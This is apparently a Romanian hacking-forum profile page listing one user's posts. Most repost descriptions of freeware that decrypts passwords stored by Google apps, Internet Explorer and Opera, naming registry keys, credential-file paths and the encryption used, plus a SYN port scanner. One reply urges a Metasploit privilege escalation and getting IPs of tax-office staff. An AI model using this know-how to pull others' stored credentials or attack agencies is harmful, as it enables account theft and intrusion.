Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. About GooglePasswordDecryptor GooglePasswordDecryptor is the FREE tool to instantly recover stored Google account passwords by various Google applications as well as popular web browsers. Most of the Google's desktop applications such as GTalk, Picassa etc store the Google account passwords to prevent hassale of entering the password everytime for the user. Even the web browsers store the sign-on passwords including Google account passwords in an encrypted format. GooglePasswordDecryptor automatically crawls through each of these applications and recovers the encrypted Google account password. Google uses the single centralized account for managing all of its services such as Gmail, Picassa, GTalk, iGoogle, Desktop Search etc. Since all of these core services are controlled by one account, losing the password will easily make one's life miserable. Also trying the Google password recovery service will turn out to be useless unless you have setup the secondary account for receiving the password and you remember all the personal details that you have entered at the time of account creation. In such cases, GooglePasswordDecryptor helps in recovering any stored Google account password from various desktop applications & web browsers. It works on wide range of platforms starting from Windows 2000 to latest operating system Windows 7. Features of GooglePasswordDecryptor GooglePasswordDecryptor supports recovering of the stored Google account password from most of the prominent Google desktop applications as well as popular internet browsers. Here is the complete list of supported applications. Google Talk Google Picassa Google Desktop Seach Gmail Notifier Internet Explorer (all versions from 4 to 8) Google Chrome Here are the highlights of top features of GooglePasswordDecryptor which makes it stand apart from other similar tools including commercial ones. Instantly decrypt and recover stored encrypted Google account password from prominent Google desktop applications as well as popular web browsers. Multi-user support for recovering Google password stored within different user accounts. Support recovering multiple Google accounts stored with any of the supported applications. Automatically discovers the supported applications from their respective install location and recovers the password instantly. Passwords are not shown by default for security reasons as it is sensitive data. However user can toggle this behavior using 'Show Password' button. On successful recovery operation, username, password along with a corresponding application store is displayed. Sort feature to arrange the displayed password list by username and password which makes it easy to search through 100's of entries. User can save the recovered Google password list to HTML file for transferring to other system or for future use. Easy and faster to use with its enhanced user friendly interface. Does not require any installation as it is standalone portable tool and can be run directly on any system. Internals of GooglePasswordDecryptor Each of the above mentioned applications use their own encrypted format and storage location to securely store the Google account password. GooglePasswordDecryptor uses different techniques to decrypt these passwords and present them in the clear text. Each of these encryption formats and how to recover password for all these applications are clearly illustrated in the following research article. 'Exposing the Google Password Secrets' Using GooglePasswordDecryptor GooglePasswordDecryptor is the standalone application and it does not require any installation. You can copy it to any location and run it directly. Here are the brief usage details, On launch GooglePasswordDecryptor displays the current username and version of Internet Explorer. Next you can click on 'Start Recovery' button to recover Google account password from supported applications. If the Google password is stored through any of these supported applications then it will be automatically discovered and decrypted. By default passwords are not shown for security reasons as it is sensitive data. However you can click on 'Show Password' button at the bottom to view these passwords. Finally you can save all recovered password list to TEXT or HTML file by clicking on 'Save as Text' or 'Save as HTML' button respectively. Note that GooglePasswordDecryptor recoveres the stored Google password for currently logged on user only. If you want to recover the password for different user then you can right click and select 'Run as' to run it as respective user. Screenshots of GooglePasswordDecryptor Here are the screenshots of GooglePasswordDecryptor Screenshot 1: GooglePasswordDecryptor showing the recovered Google password accounts from various applications. Passwords are not shown for security reasons as it is sensitive data. Screenshot 2: GooglePasswordDecryptor showing the recovered Google password accounts with clear text password when user clicks on 'Show Password' button. Screenshot 3: Exported Google account password list in HTML format by GooglePasswordDecryptor. Release History Version 1.5 : 9th May 2010 New enhanced user interface, resolution of chrome issues, show/hide password security option and support for recovering password from latest Picasa version. Version 1.0 : 12th Dec 2009 First public release of GooglePasswordDecryptor which can recover Google account passwords stored by prominent applications. Also features the export functionality to save the recovered password data in HTML as well as plain text format. Disclaimer GooglePasswordDecryptor is designed for good purpose to help users to recover the lost Google account password. Like any tool its use either good or bad, depends upon the user who uses it. However author is not responsible for any damage caused due to misuse of this tool. Download GooglePasswordDecryptor FREE Download GooglePasswordDecryptor 1.5 License : Freeware Platform : Windows XP, 2003, Vista, Win7 Download
  2. About IEPasswordDecryptor IEPasswordDecryptor is the free tool to quickly and easily recover stored passwords from Internet Explorer. It can recover both Autocomplete and HTTP basic authentication based passwords from IE secret store. User can double click on any of the entry to visit the website which makes it easy to verify sign-on passwords. It also comes with distinctive feature which allows the user to reset the IE content advisor password in case user has lost it. It also presents 'IE history manager' interface which not only displays the contents of IE history in detail but also provides the option to add/remove websites with ease. User can save the displayed password list and IE history list to TEXT as well HTML file for offline verification & storage. IEPasswordDecryptor can recover passwords from all version of Internet Explorer starting from version 4.0 to latest version 8.0. Newer version presents the enhanced look & feel with cool button interface. Features of IEPasswordDecryptor Here are the salient features of IEPasswordDecryptor Recover Autocomplete and HTTP basic authentication based passwords from IE version 4.0 to 8.0 Recover HTTP basic authentication passwords from IE version 4.0. to 8.0 Reset the content advisor password of Internet Explorer Export option to save the decrypted password list to TEXT or HTML file. Displays websites stored by IE history along with option to add/remove entries Export option to save the displayed IE history list to HTML file. Sort the password and history entries based on various fields by just clicking on the column header. Visit the website by directly double clicking on displayed entry. 'Add Website' option to add website link to existing IE history to help in recovering password for which website link is not present in IE history (applicable for IE version 7 or more). Internals of IEPasswordDecryptor Like most browsers, Internet Explorer also has the single sign-on feature which stores the username/password for already authenticated websites. Whenever user login to any website, IE prompts the user for consent to store the password for future use. If user acknowledges then username/password along with website link will be stored in IE secret store. So the next time onwards whenever user visits the same website, IE automatically populates the username/password field from its store thus preventing user from entering credentials every time. Internet Explorer stores two type of passwords, Autocomplete and HTTP basic authentication based passwords. Autocomplete passwords are normal website login passwords such as email, forum websites. HTTP basic authentication password is the one which is required to login to website itself. As soon as user tries to access the website, IE prompts with login dialog box asking for username/password. Generally proxy servers and router/modem configuration websites uses these kind of authentication mechanism. Internet Explorer below version 7 stores both Autocomplete and HTTP basic authentication passwords in the secure location known as 'Protected Storage'. Windows has introduced 'Protected Storage' to allow applications such as IE, Outlook to store the secrets securely in an encrypted format. Below is the registry location corresponding to the 'Protected Storage'. HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider With version 7 onwards IE has changed the location of password store to provide better security mechanism compared to existing 'Protected Storage'. Now IE stores all the Autocomplete passwords in below mentioned registry location in an encrypted format. HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 Here is the screenshot of typical entries stored at this location Here each entry corresponds to a hash of the website for which username/password has been stored. So one must know the website login link to recover the password. In order to solve this problem, IEPasswordDecryptor uses the website list from the IE history and verifies if any of them matches with stored hash entry. So if a website link is not present in the IE history then the password for such stored website entry cannot be recovered. In such case you can use 'Add Website' option of IEPasswordDecryptor to add the website link to existing IE history as shown in the Screenshot 3 below. The HTTP basic authentication passwords are stored in the 'Credentials store'. The 'Credentials Store' is newly introduced secret store mechanism by Windows and it is generally used to store the network login passwords. Its location is given below. [Windows XP] C:\Documents and Settings\[username]\Application Data\Microsoft\Credentials [Windows Vista+] C:\Users\[username]\AppData\Roaming\Microsoft\Credentials IEPasswordDecryptor automatically detects the IE version and correspondingly decrypt the username/passwords from the appropriate secret store. For more detailed technical information on decrypting the passwords from IE store read the article on 'Exposing the Secrets of Internet Explorer'. Using IEPasswordDecryptor IEPasswordDecryptor is a standalone application which does not require any installation and can be directly run after copying to local system. It comes with both IE password manager as well as IE history manager feature. Using IE Password Manager feature Launch the IEPasswordDecryptor on your local system. It will automatically detect the Internet Explorer version and displays Autocomplete as well as HTTP basic authentication passwords. You can double click on any of the displayed entry to visit the website directly for quick verification. Next you can save the username/password list to text or html file by clicking on 'Save to Text' or 'Save to HTML' button. It also provides option to reset the IE content advisor password. Using IE History Manager feature After launching the IEPasswordDecryptor, click on 'IE History Manager' tab as shown in the screenshot 2 below. It will display all the websites from IE history along with website link, website title and visited date. You can use the Remove/'Remove All' button to remove either single or all websites from IE history. Next you can save this history list to html file by clicking on 'Save to HTML' button. Optionally, you can use 'Add website' button to add website link to existing IE history. This will help in recovering password for the website whose entry is missing from IE history. Because IE 7 & 8 require website link to recover the stored password. Here are some of the popular website links which you can add using 'Add website' option. [All Google websites, Gmail, Orkut etc] https://www.google.com/accounts/servicelogin [Digg] http://digg.com [Twitter] http://twitter.com [Linkedin] https://www.linkedin.com/secure/login [AOL] https://my.screenname.aol.com/_cqr/login/login.psp [Myspace] http://www.myspace.com [Amazon] https://www.amazon.com/gp/css/homepage.html [stumbleupon] Create Your Personal Account | StumbleUpon [slashdot] Slashdot Bookmarks [Reddit] reddit.com: login or register IEPasswordDecryptor in Action Here are the screenshots of IEPasswordDecryptor showing it in action... Screenshot 1: IEPasswordDecryptor showing the decrypted username & passwords from Internet Explorer. Screenshot 2: IEPasswordDecryptor showing the history manager to view/add/remove the websites stored in IE history. Screenshot 3: 'Add Website' option to add the website link to existing IE history. This helps in recovering password (only for IE version 7 or more) for the website whose entry is not present in the IE history list. Screenshot 4: Exported website username/password list in standard HTML format by IEPasswordDecryptor. History Version 1.6 : 9th Mar 2010 This version presents the enhanced look & feel with cool button interface. Version 1.5 : 15th Dec 2009 Support for Windows 7 version. Added functionality to display multiple account information for IE 6 autocomplete entries. Version 1.0.1 : 1st Sep 2009 First public release of IEPasswordDecryptor supporting the recovery of sign-on passwords from all versions of Internet Explorer along with support for managing IE history. Download IEPasswordDecryptor FREE Download IEPasswordDecryptor 1.6 License : Freeware Platform : Windows XP, 2003, Vista, Win7 Download
  3. About OperaPasswordDecryptor OperaPasswordDecryptor is the free tool to instantly recover the passwords stored by all versions of Opera. Like other internet browsers such as IE, Firefox etc Opera also stores the username/passwords for websites visited by user. However passwords are stored only if the user opts to save password during authentication. This is very useful feature as it prevents user from hassle of entering password everytime. Opera stores the passwords along with username, website and other related information in the password file (wand.dat) in an encrypted format. OperaPasswordDecryptor can recover all these stored encrypted passwords instantly and present it in a user readable clear text format. OperaPasswordDecryptor works on wide range of platforms starting from Windows 2000 to latest operating system Windows 7. Features of OperaPasswordDecryptor Here are the highlights of top features of OperaPasswordDecryptor which makes it stand apart from other similar tools including commercial ones. Instantly decrypt and recover stored encrypted passwords from 'Opera Secret Store' for all recent versions of Opera. Provides support for recovering stored opera passwords from different system also.User can specify remote system's wand.dat file path to recover the passwords. Automatically discovers 'Opera Password File' (Wand.dat) based on installed version of Opera. By default passwords are not displayed in clear text as it is sensitive information. However user can view the same using 'Show Password' option. On successful recovery operation, username, password along with a corresponding login website is displayed. Provides option to sort the displayed password list by username, password or website which makes it easy to search through 100's of stored account entries. User can save the displayed Opera sign-on password list to either Text file or HTML file for future use. Does not require any installation as it is standalone portable tool and can be run directly on any system. Internals of OperaPasswordDecryptor Opera stores the password in encrypted format in the file called 'Wand.dat' at its profile location. The Opera profile location is different for different versions. Here are the password file (wand.dat) location for recent versions of Opera. For Opera Version 10 and above [Windows NT/2K/2k3/XP] C:\Documents and Settings\<username>\Application Data\Opera\Opera\wand.dat [Windows Vista/Windows 7] C:\users\<username>\AppData\Roaming\Opera\Opera\wand.dat For Opera Version less than 10 [Windows NT/2K/2k3/XP] C:\Documents and Settings\<username>\Application Data\Opera\Opera\profile\wand.dat [Windows Vista/Windows 7] C:\users\<username>\AppData\Roaming\Opera\Opera\profile\wand.dat Opera stores following information in the password Wand file for each of the stored entry in the following order, Login URL of website Main URL of website Username field ID Username Password field ID Password All these information are stored in the encrypted format in wand.dat file. Opera uses Triple-DES algorithm along with static salt data to encrypt these secret information. For more details on how to decrypt these stored passwords from 'Opera Secret Store' refer to following research article, 'Exposing the Secret of Decrypting Opera Passwords' Using OperaPasswordDecryptor OperaPasswordDecryptor is the standalone application and it does not require any installation. You can just run it by double clicking on the executable file. Here are the brief usage details. On launch, OperaPasswordDecryptor tries to automatically discover the Opera password file (wand.dat). In case of failure or remote system password recovery, you can manually specify the Wand file location. Once password file is specified, click on 'Start Recovery' button and OperaPasswordDecryptor will instantly decrypt & recover any passwords stored in the specified wand.dat file. By default passwords are not shown for security reasons as it is sensitive data. However you can click on 'Show Password' button at the bottom to view these passwords. Finally you can save all recovered password list to TEXT or HTML file by clicking on 'Save as Text' or 'Save as HTML' button respectively. You can also use OperaPasswordDecryptor to recover passwords from different system. In that case you can copy opera wand file from the remote system and then manually specify that path in 'Opera Wand File' field. Screenshots of OperaPasswordDecryptor Here are the screenshots which gives glance of OperaPasswordDecryptor in action. Screenshot 1: OperaPasswordDecryptor showing the recovered passwords from Opera password store. Note that passwords are hidden by default for security reason. Screenshot 2: Showing the hidden passwords recovered by OperaPasswordDecryptor. Screenshot 3: Opera recovered password list exported in HTML format by OperaPasswordDecryptor. History Version 1.0 : 14rd April 2010 First public release of OperaPasswordDecryptor. Supports recovery of passwords from all versions of Opera across the platforms starting from Windows 2000 to latest operating system Windows 7. Acknowledgements Special thanks to sna@reteam.org for original work on decryption of Opera password file. This tool is based on his great piece of work. Disclaimer OperaPasswordDecryptor is the free tool and designed for good purpose to help users to recover the lost outlook account passwords. Like any other tool its use either good or bad, depends upon the user who uses it. However author is not responsible for any damage caused due to misuse of this tool. Download OperaPasswordDecryptor FREE Download OperaPasswordDecryptor 1.0 License : Freeware Platform : Windows 2K, NT, XP, 2003, Vista, Win7 Download
  4. Introduction There are various port scanners which uses simple method of scanning. These applications uses the normal connect method to scan open ports and it takes long time. This scanner is faster than normal scanner as it uses faster 'TCP Half Open' Scanning or 'TCP SYN' scanning technique. This method is less detectable than the simple port scanner. Half Open Scanning Method ? When any two hosts wants to communicate together connection must be established between them. In case of TCP connection, three way handshake takes place between source and destination hosts. Below is the exact sequence of packets exchanged between the hosts. First the source host A sends the SYN packet (TCP packet with SYN flag set) to host B. If the port is open then host B responds by sending SYN+ACK packet. else it sends the RST+ACK packet to host B. Now host A sends the ACK packet to host B. (if SYN+ACK packet is received). Once the connection is established, both machines can transmit data packet until one of them ends the connection by sending FIN packet. Some of the simple port scanners use this technique. It can be implemented by creating socket and calling 'Connect method' on each port. This is simple to implement but very slow method and more over it can be easily detected. Half scanning is more fast and efficient than full scanning technique. Half open connection is explained below. First the host A sends the SYN packet (TCP packet with SYN flag set) to host B. If the port is open then host B responds by sending SYN+ACK packet. else it sends the RST+ACK packet to host B. Since the host A does not send any additional ACK packet , it is called half open connection. Now the host can easily find out if the target port is open or closed. It it receives TCP packet with SYN+ACK flag set, then it means that target port is open. If it receives RST+ACK packet, it implies that target port is closed. In this method full handshake does not take place , hence it is quite faster than full scanning method. Since the implementation has to be done at the protocol level , knowledge of TCP/IP protocol suite is essential. Implementation Core part of the implementation is sending the TCP packet and ARP packet. This involves building the raw packet by filling all headers. For this we must know MAC address of the source and destination machine. MAC address also called Ethernet address, is the address associated with Ethernet adapter. Finding Source MAC Address There are various methods for obtaining the source MAC address. This method is simple. IP_ADAPTER_INFO adapter[5]; DWORD buflen=sizeof(adapter); DWORD status=GetAdaptersInfo(adapter,&buflen); Now the adapter structure contain the source MAC address. Finding Destination MAC Address This is done by sending ARP packet. ARP packet is used to determine the host's MAC address when its IP address is known. First ARP request packet is sent by specifying the source MAC address, source IP address and destination IP Address. The ARP reply packet contains the destination MAC address. This method also prevents the target host from sending ARP packet to source host when the source host sends the first SYN packet during scanning process. From the ARP request packet that we have sent, target host will come to know about the MAC address of the source host. Scanning Process Scanning process involves building TCP packet. For this one has to prepare the Ethernet Header, IP header and TCP header. Header file 'packet.h' contains the format details for each of these headers. You can refer RFC for details regarding these formats. Each time during scanning TCP SYN packet is sent with different port numbers. Then the corresponding reply packet is checked for the flag RST+ACK or SYN+ACK. Based upon this flag target port status is determined. PortScanner in Action Requirements All header files and libraries can be found in Winpcap developer pack 3.0 or higher version. Don't forget to specify these 'include' and 'lib' paths while building from the source code. For binary files such as winpcap.dll, install Winpcap 3.0 or higher version. Download PortScanner PortScanner Version 2.0.1 Note: You need to download Winpcap to use this tool.
  5. About VistaUACMaker Vista has introduced new feature called UAC (User Account Control). In short it basically controls the way in which applications are executed by different users. Due to enforcement of this UAC, by default any application on Vista will run under the context of standard user instead of administrator. As a result the application which requires administrator privilege will fail to work properly on Vista. So VistaUACMaker is designed to address this problem by making any Windows XP based application compatible with Vista as well as Windows 7. Making Application Vista UAC Compliant To make any application Vista UAC compliant one has to embed a manifest file specifying the privilege required by the application. Manifest file mainly contain 2 important information, privilege required by the application and UI interaction of application with other windows. There are 3 types of privileges that can be mentioned in the manifest file. requireAdministrator : Run as administrator asInvoker : Run as same privilege as parent process highestAvailable : Run with highest privilege available for user Other than this, one has to specify if the application interacts with user interface of other high privilege applications. For example your application may send the message to modify the UI of other high privilege application. This is specified through following parameter uiAccess : TRUE/FALSE UAC Manifest File Manifest file is generally put into the resource section of the application. Typical manifest file with administrator privilege and with no "uiAccess" appears like this. [SIZE=2]<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" processorArchitecture="*" version="1.0.0.0" name="MyApplication.exe"></assemblyIdentity> <description>Vista Application</description> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"></assemblyIdentity> </dependentAssembly> </dependency> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="FALSE"></requestedExecutionLevel> </requestedPrivileges> </security> </trustInfo> </assembly> [/SIZE] VistaUACMaker in Action VistaUACMaker has both console and GUI version. Here is the screenshot of the GUI version Here is the screenshot of the Console version... Using VistaUACMaker GUI version In just 3 steps, your application will be ready to run on Vista/Win7 Select the application using browse button. Set one of the privilege required for your application from selection box. Check the "Yes" button if your application interacts with high privilege applications. Once you have made the settings, click on "Make It" button. Now your application will automatically run as per the privilege set rather than usual "standard user" account. Using VistaUACMaker Console version Console tool makes it easy to automate the process. For example you can use it as post build step to make the application Vista/Win7 UAC compliant. Here is the typical usage information. VistaUACMakerConsole [-d <description>] [-p <priv level>] [-ui] {exe_path} Options: -d Description of the project ( Default : My project ) -p Privilege level required. possible values : admin, invoker, highest admin = administrator invoker = same as parent process highest = Highest possible level for the user -ui Specify if the executable interacts with higher windows. (Default action is not to set this flag) Example: VistaUACMakerConsole -d "Vista project" -p admin "c:\project.exe" History Version 2.0 : 13th Jan 2010 Support for Windows 7. New attractive GUI with cool look & feel. Version 1.5 : 29th May 2009 Enhanced user interface with improved about dialog. Version 1.0 : 30th Jan 2006 First public release of VistaUACMaker Download VistaUACMaker FREE Download VistaUACMaker GUI Version 2.0 FREE Download VistaUACMaker Console Version 1.5 License : Freeware Platform : Windows XP, 2003, Vista & Win7 Download
  6. Password Recovery Tools ChromePasswordDecryptor FireMaster FirePassword FirePasswordViewer GooglePasswordDecryptor IEPasswordDecryptor NetworkPasswordDecryptor OperaPasswordDecryptor OutlookPasswordDecryptor [*]Spyware/Rootkit Removal Tools Advanced WinServiceManager SpyBHORemover SpyDLLRemover StreamArmor [*]Network Tools LDAPSearch NetShareMonitor PortScanner ProcNetMonitor RemoteDirDetector SSLCertScanner WinSniff [*]System Tools ProcHeapViewer RemoteDLL SFCList VistaUACMaker [*]Products from www.SecurityXploded.com //voi posta cu nerusinare toate toolurile lor pe rst.
  7. begood

    probleme

    Si mie mi se intampla, dar am modificat din user CP, la Message Editor Interface, "Enhanced Interface" si s-a rezolvat.
  8. begood

    La multi ani qbert

    Sa traiesti, baiete !
  9. In this news clip, we see how most high-end copier machines ship with a hard drive which stores a copy of all the documents the copier prints, scans or faxes. Once the machine is decommissioned these files still remain on the hard drive and can be restored using off the shelf disk forensic tools. In this video, we see a couple of such data recovery stunts from copy machines of law enforcement officials. Chiar merita vazut Hacking with Copier Machines Tutorial puteti face si voi.
  10. se complica aiurea, putea sa foloseasca scriptul din metasploit cu privilege escaladation. doar de nu mergea ala, trebuia sa faca ultimii pasi. @Kabron fa rost de ip-urile de la FISC sau de la vreo pizda ce lucreaza acolo.
  11. wrong forum, warn. in tutoriale in engleza zboara. btw esti atat de ratat incat ai pus la description la alt video urcat de tine, linkul de administrare catre un "zeus" backdoor-uit
  12. Twitter Phishing on Vimeo
  13. 24 Hours RFI Honey Net Stats Last 24 hours tiers RFI Events Last 24 hours details Events / RFI / SIP last 24 hours RFI / SIP last 24 hours SIP vs RFI ratio last 24 hours Events / RFI and Events / SIP last 24 hours Google Tiers RFI Geomap for 24 hours Google RFI events Geomap for 24 hours Google RFI source IPs Geomap for 24 hours Last 24 hours top 5 tiers RFI countries events activities Last 24 hours source IPs countries numbers versus Tiers RFI countries radar Last 24 hours top 10 tiers RFI countries with total number of events Last 24 hours countries details 1 Week RFI Honey Net Stats Last week tiers RFI Events Last week details Events / RFI / SIP last week RFI / SIP last week SIP / RFI ratio last week Events / RFI and Events / SIP last week Google Tiers RFI Geomap for 1 week Google RFI events Geomap for 1 week Google RFI source IPs Geomap for 1 week Last week top 10 tiers RFI countries with total number of events Last week countries details 1 Month RFI Honey Net Stats Last month tiers RFI Events Last month details Events / RFI / SIP last month RFI / SIP last month SIP / RFI ratio last month Events / RFI and Events / SIP last month Google Tiers RFI Geomap for 1 month Google RFI events Geomap for 1 month Google RFI source IPs Geomap for 1 month Last month top 10 tiers RFI countries with total number of events Last month countries details 12 Months RFI Honey Net Stats Last year tiers RFI Events Last year details Events / RFI / SIP last 12 months RFI / SIP last 12 months SIP / RFI ratio last 12 months Events / RFI and Events / SIP last 12 months Google Tiers RFI Geomap for 12 months Google RFI events Geomap for 12 months Google RFI source IPs Geomap for 12 months Last 12 months top 10 tiers RFI countries with total number of events Last year countries details http://twitpic.com/1drd59/full Eric Romang Blog
  14. Pur informativ.
  15. http://img46.imageshack.us/img46/3752/lollty.png
  16. N-am ce descriere sa va pun, e self-explanatory. HTML5 Security Cheatsheet
  17. The Pidgin developers have announced the release of version 2.7.0 of their open source instant messenger application. According to Pidgin developer John Bailey, the latest major release includes a number of bug fixes and new features and addresses a security issue. Pidgin 2.7.0 features a new user interface (UI) for sending attentions, such as buzz or nudge, on supported protocols, the addition of a menu set moot for XMPP and ICQ accounts, and support for IPv6 has been added to Bonjour, formerly known as Rendezvous. Support for custom ICQ status icons known as X-Status, and sending and receiving HTML-formatted messages in ICQ have also been added. Other changes include fixes for AIM, ICQ, and Yahoo! JAPAN login, and updates to the Message Timestamp Formats plug-in. A denial of service (DoS) issue in libpurple's MSN protocol plug-in related to emoticons has also been addressed that could have allowed an attacker to remotely crash a users client. The vulnerability does not, however, allow for the execution of arbitrary code. This isn't the first time MSN emoticons have lead to security problems in Pidgin. The previous 2.6.6 release from February addressed two MSN related exploits. The developers note that support for version 9 of the MSN protocol has been removed as it is no longer supported on the servers and advise all users to upgrade to the latest release as soon as possible. More details about the release can be found in the change log. Pidgin 2.7.0 is available to download for Windows, Mac OS X and Linux from the project's web site requires GLib 2.12.0 and GTK+ 2.10.0 or later. Pidgin is released under the GNU General Public License (GPL). Pidgin 2.7.0 addresses emoticon vulnerability - The H Security: News and Features
  18. Facebook reminds you of life without it if you try to de-activate. Facebook’s had a bad week over concerns about how it treats user data. Ready to delete your account? It’s harder than you may think. Deactivating and deleting your Facebook account are two very different things. What Facebook makes difficult to find out is deactivation is temporary, deletion is permanent. And unlike deactivation, you need Facebook’s help to permanently delete the information. (See the top 10 Facebook stories of 2009.) The actual deactivation process is fairly simple. Once logged in, click on Account Settings, and select Deactivate Account at the bottom. But first, Facebook gives you a guilt trip in the form of an ad with Facebook friends and your memories together, suggesting they’ll miss you. If you can make it past that (you coldhearted person, you) be sure to click “Opt out of receiving emails from Facebook.” Otherwise your friends can still invite you to events, ask you to join groups, and even tag you in photos. But deactivation is very different than deletion. Facebook keeps all your photos and information. Its as if you’re invisible. The information is still there, and it’s still easily accessible to you (and Facebook) by just logging back in. Facebook wants you to have the power to deactivate, but makes permanently deleting your information quite difficult. To actually delete your account you must request Facebook to eliminate it, and you must navigate through five other pages to get to that point. To delete, log in, scroll all the way down to the very bottom of the page and find the link to Help Center. Once there, click on Privacy Settings. Next, scroll halfway down the page to “Deactiviating, Deleting and Memorializing Accounts.” Next, click on “How do I permanently delete my account?” Read the explanation, and then click again on the word “here” which is hyperlinked in the text. It’ll generate a request for Facebook, who can take your information off the grid for good. Why is deleting your Facebook profile so hard? Facebook doesn’t want you to really get rid of all your information. Because once it’s gone, you’re no longer one log-in away from coming back and sharing anew. Read more: Why Is It So Hard to Delete Your Facebook Account? - TIME NewsFeed
  19. =========================================================== Ubuntu Security Notice USN-938-1 May 13, 2010 kdenetwork vulnerability CVE-2010-1000 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: kget 4:4.2.2-0ubuntu2.3 Ubuntu 9.10: kget 4:4.3.2-0ubuntu4.1 Ubuntu 10.04 LTS: kget 4:4.4.2-0ubuntu4.1 After a standard system update you need to restart your session to make all the necessary changes. Details follow: It was discovered that KGet did not properly perform input validation when processing metalink files. If a user were tricked into opening a crafted metalink file, a remote attacker could overwrite files via directory traversal, which could eventually lead to arbitrary code execution. Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.2.2-0ubuntu2.3.diff.gz Size/MD5: 36775 6a8af519ab911b42c02c83c28512df42 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.2.2-0ubuntu2.3.dsc Size/MD5: 2167 217f5efe918c9406671b3f68714f27bd http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.2.2.orig.tar.gz Size/MD5: 7998863 12e63f41947eab454f579f8f456f79d5 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.2.2-0ubuntu2.3_all.deb Size/MD5: 26164 8aad393a8c6f9b45560629bb65eccd95 http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kopete-plugin-otr-kde4_4.2.2-0ubuntu2.3_all.deb Size/MD5: 25930 c1431376f8d13b6e08624df67d966614 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kde-zeroconf_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 61004 d71fa2cdb6f43998a348d6b21a2bbe38 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dbg_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 55996270 7864bdf750ea7a72558d24dc3ced5271 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dev_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 187616 e67f975a80469376ebb5af26d045db82 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 635376 9bf591a889d6e127ccf83e95300074e9 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kget_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 1346462 021c5f4e5db6286a103057d74c0b3281 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 7344300 f0f99bf525d766702e7e674a299771f4 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 708854 ae532936a89bfa3f8075de2cb36ff807 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 398284 bdbfcf7f042a9939d4232499f491a513 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_4.2.2-0ubuntu2.3_amd64.deb Size/MD5: 466328 15cdb669bff2fba3079939f8076e4db9 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kde-zeroconf_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 56162 24890ffe7e250bb0bb3ea10f26242f46 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dbg_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 55359476 dcb01239813d7c3b1129cced371de00c http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dev_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 180506 cfc9e3dc5a7caf2267e01f45d00e8095 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 609408 63d5687455ab22147fa5b0642707cb54 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kget_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 1311050 cbbe6c7b16430d152f3f340a588a723e http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 7005996 d92734b3d44c914b81121d4d2c4f40ef http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 689604 7c10cdc5212543c0177f2abe1a82cafa http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 388860 cae692d52760290721be35b680c2e236 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_4.2.2-0ubuntu2.3_i386.deb Size/MD5: 460736 d69ab19ba5b8206344f76ed7629c0672 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 56434 dd826aa96020ade7b1ae669c9d0bee12 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 55424634 4b484c7106d9ae834f8d7589e6dd9bf4 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dev_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 180308 